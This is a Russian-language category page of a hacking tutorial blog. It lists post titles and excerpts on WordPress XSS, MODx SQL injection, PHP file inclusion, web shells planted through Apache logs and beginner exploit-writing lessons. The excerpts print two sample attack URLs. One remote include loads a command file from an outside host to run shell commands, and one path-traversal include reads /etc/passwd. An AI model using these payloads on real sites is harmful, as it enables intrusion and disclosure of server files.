Содержимое рубрики "Хакерство"

Подрубрики

Сортировка:

WordPress Audio Player Plugin XSS in SWF

Wordpress Audio Player Plugin XSS in SWF

WordPress NextGEN Gallery plugin Cross-Site Scripting Vulnerability

Wordpress NextGEN Gallery plugin Cross-Site Scripting Vulnerability

2. Практика, простой пример на с язык ассемблера, процессор х86 (objdump, регистры EAX, ECX, EDX, EBX, ESP, EBP, ESI, EDI, EIP, отладчик GDB)

пока готовиться данная статья

Защита от удаленного инклуда

Чтобы защититься от удаленного инклуда, рекомендуется перечислить все допустимые названия страниц в программе с использованием инструкции множественного выбора (switch case). Вот небольшой пример:

1. Программирования на С в unix(х82) системах

Урок 1 по эксплоитам — Программирования на С в unix(х82) системах (переменные, циклы, операторы, функции)

SQL-инъекция в MODx

SQL-инъекция в MODx, реальный пример на известном движке.

4. Создание веб шела в логах apache через локальный инклуд

Рассмотрим более интересное применение локальной иньекции, создание веб-шелла, действующего через логи(журналы) сервера Apache.

3.1. Пример php инклуда или веб-шелл в картинке

Пример — локального инклуда.

Удаленный PHP — Инклуд

Если локальный инклуд позволят только просматривать файлы, то удаленный, или глобальный, инклуд дает возможность загружать файлы с других веб сайтов. Загружаемый с хакерского сайта файл может содержать небольшую прорамму на языке PHP, позволяющую нам из адресной строки браузера вводить nix -команда, которые будут выполняться на атакуемой система. Например http://test.ru/include.php?com=http://narod.ru/cmd.txt&cmd=ls В данном примере команда ls выводит […]

Локальный PHP- инклуд

Локальный инклуд позволяет хакеру загружать в браузер и просматривать файлы на сервере. допустим http://test.ru/index.php?page=./../../../etc/passwd%00 И у вас откроется данный файл скорее всего. ./ -текущий каталог ../- переход на уровень выше %00 — шестнадцатеричный код для передачи по протоколу HTTP Нулевого байта (конец строки).  — про HTTP можно прочитать в книге PHP  Д. Н. Колисниченко хорошо рассказываться история HTTP приводит разницу […]